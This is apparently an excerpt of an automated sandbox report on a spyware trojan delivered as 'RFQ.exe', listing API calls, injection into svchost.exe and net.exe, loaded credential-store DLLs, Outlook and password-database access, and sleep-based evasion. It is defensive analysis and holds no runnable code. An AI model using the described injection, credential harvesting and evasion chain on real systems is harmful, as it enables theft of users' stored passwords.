Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03673010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03673090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03673D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03673D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03924340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03924650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_039235C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_039239B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922FA0 NtQuerySection
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03922C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03923090 NtSetValueKey
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03923010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03923D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03923D70 NtOpenThread
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030C9310 NtCreateFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030C9780 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030C9620 NtClose
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030C9580 NtDeleteFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030C9480 NtReadFile
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030CBC2011_2_030CBC20
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0374E30411_2_0374E304
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0375522411_2_03755224
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0374E1E411_2_0374E1E4
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0374D76811_2_0374D768
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0374E46C11_2_0374E46C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 102 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0396F290 appears 105 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03925130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 038DB970 appears 277 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03937E54 appears 111 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0395EA12 appears 86 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 004115D7 appears 36 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 00416C70 appears 39 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 00445AE0 appears 65 times
                Source: RFQ.exe, 00000001.00000003.1280590197.000000000495D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exe, 00000001.00000003.1282452429.00000000047B3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/8
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0044AF6C GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
                Source: C:\Users\user\Desktop\RFQ.exe | File created: C:\Users\user~1\AppData\Local\Temp\fricandeaux
                Source: RFQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\RFQ.exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\RFQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: net.exe, 0000000B.00000002.3124155350.0000000003384000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1695081493.0000000003384000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1695081493.00000000033B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\RFQ.exe | File read: C:\Users\user\Desktop\RFQ.exe
                Source: unknown | Process created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Users\user\Desktop\RFQ.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: RFQ.exe | Static file information: File size 1338211 > 1048576
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000007.00000003.1469963468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469615717.000000000301A000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000002.3127273344.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rNgGAKxrFRkFYx.exe, 00000009.00000000.1356331320.0000000000A5E000.00000002.00000001.01000000.00000005.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3128393871.0000000000A5E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000001.00000003.1282585715.0000000004830000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000001.00000003.1280437204.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1329249007.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1327461526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.0000000003600000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1509162066.0000000003707000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1506988926.0000000003554000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ.exe, 00000001.00000003.1282585715.0000000004830000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000001.00000003.1280437204.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1329249007.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1327461526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.0000000003600000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 0000000B.00000002.3129632807.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1509162066.0000000003707000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1506988926.0000000003554000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 0000000B.00000002.3130867153.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1576072994.00000000027DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1814266241.000000001418C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 0000000B.00000002.3130867153.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1576072994.00000000027DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1814266241.000000001418C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000007.00000003.1469963468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469615717.000000000301A000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000002.3127273344.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0040EBD0 LoadLibraryA,GetProcAddress
                Source: RFQ.exe | Static PE information: real checksum: 0xa961f should be: 0x14bb9b
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00416CB5 push ecx; ret 1_2_00416CC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00401ACE push eax; iretd 7_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_004061DF push FFFFFF9Bh; retf 7_2_004061E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040AA1D push edi; retf 7_2_0040AA23
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00401B40 push eax; iretd 7_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0041933F push ss; ret 7_2_00419355
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00405BF7 push FFFFFFE2h; iretd 7_2_00405BFD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00404BB6 push ds; iretd 7_2_00404BB8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00403420 push eax; ret 7_2_00403422
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00413CE3 push es; retf 7_2_00413D12
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00418F53 push esp; ret 7_2_00419157
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0040AF60 push 0000007Bh; iretd 7_2_0040AF62
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036309AD push ecx; mov dword ptr [esp], ecx 7_2_036309B6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_038B225F pushad ; ret 11_2_038B27F9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_038B27FA pushad ; ret 11_2_038B27F9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_038E09AD push ecx; mov dword ptr [esp], ecx 11_2_038E09B6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_038B283D push eax; iretd 11_2_038B2858
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_038B1368 push eax; iretd 11_2_038B1369
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030A27D4 push FFFFFFE2h; iretd 11_2_030A27DA
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030B08C0 push es; retf 11_2_030B08EF
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030C0E6A push esp; retf 11_2_030C0E6B
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030A2DBC push FFFFFF9Bh; retf 11_2_030A2DBE
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030A1793 push ds; iretd 11_2_030A1795
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030A75FA push edi; retf 11_2_030A7600
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030A7B3D push 0000007Bh; iretd 11_2_030A7B3F
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030B5B30 push esp; ret 11_2_030B5D34
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030BB83A push esp; iretd 11_2_030BB85B
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030B5F1C push ss; ret 11_2_030B5F32
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03744360 push ss; retf 11_2_03744366
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03745170 push ss; ret 11_2_0374518C
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_03755062 push eax; ret 11_2_03755064
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Windows\SysWOW64\net.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\RFQ.exeAPI/Special instruction interceptor: Address: 40332BC
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00418F53 rdtsc 7_2_00418F53
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 9840Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-87543
                Source: C:\Users\user\Desktop\RFQ.exeAPI coverage: 3.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\net.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 7692Thread sleep count: 132 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7692Thread sleep time: -264000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7692Thread sleep count: 9840 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7692Thread sleep time: -19680000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe TID: 7716Thread sleep time: -60000s >= -30000sJump to behavior
